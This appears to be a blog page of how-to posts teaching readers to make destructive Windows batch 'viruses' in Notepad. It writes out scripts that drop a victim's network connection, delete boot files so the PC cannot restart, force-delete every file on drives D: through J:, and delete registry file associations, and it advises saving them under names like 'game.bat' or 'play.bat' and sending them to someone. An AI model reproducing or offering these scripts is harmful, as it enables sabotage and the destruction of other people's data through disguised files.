Showing posts with label How to stop Internet Access. Show all posts
Showing posts with label How to stop Internet Access. Show all posts

How To Stop Someone's Internet Access

By // 2 comments:
Hello Friends Today I Want To Share With You 

How To Stop Someone's Internet Access
Step 1 >> Open Notepad.


Step 2 >> Copy Code .

************************************************************

@Echo off
Ipconfig /release


*************************************************************


Step 3 >> Save that as Fun .bat and send it to someone. 

They're IP address will be lost, and therefore they won't be able to fix it

However, this is VERY easy to fix. 

Note :- Open CMD AND TYPE IPconfig /renew

How to Crash a PC Forever

By // No comments:

Learn How To Make A Dangerous Virus Using Notepad....



How to crash a PC Forever !::: 

Step 1 >> Open Notepad .

Step 2 >> Copy Code .

***************************************************
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini


***********************************************

Step 3 >>Save it as a game.bat file.
This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.
REMEMBER - DO NOT CLICK THIS FILE.

How To Make A Virus

By // No comments:
Also Read:-

Learn How To Make A Dangerous Virus Using Notepad....

Just open your notepad
1) Click start -> all programs -> accessories -> notepad
2) Or just press or click windows key + r :: run window will open and
type notepad and hit enter .

NOW TYPE THE FOLLOWING CODE ::
*********************************************************
@echo off
del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q


***************************************************************

Then save it as game.bat and the batch file is created .


WARNING :: This is the most dangerous virus! Be careful with its use.


Delete the entire registry


@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*

Now save it as play.bat and the batch file is created .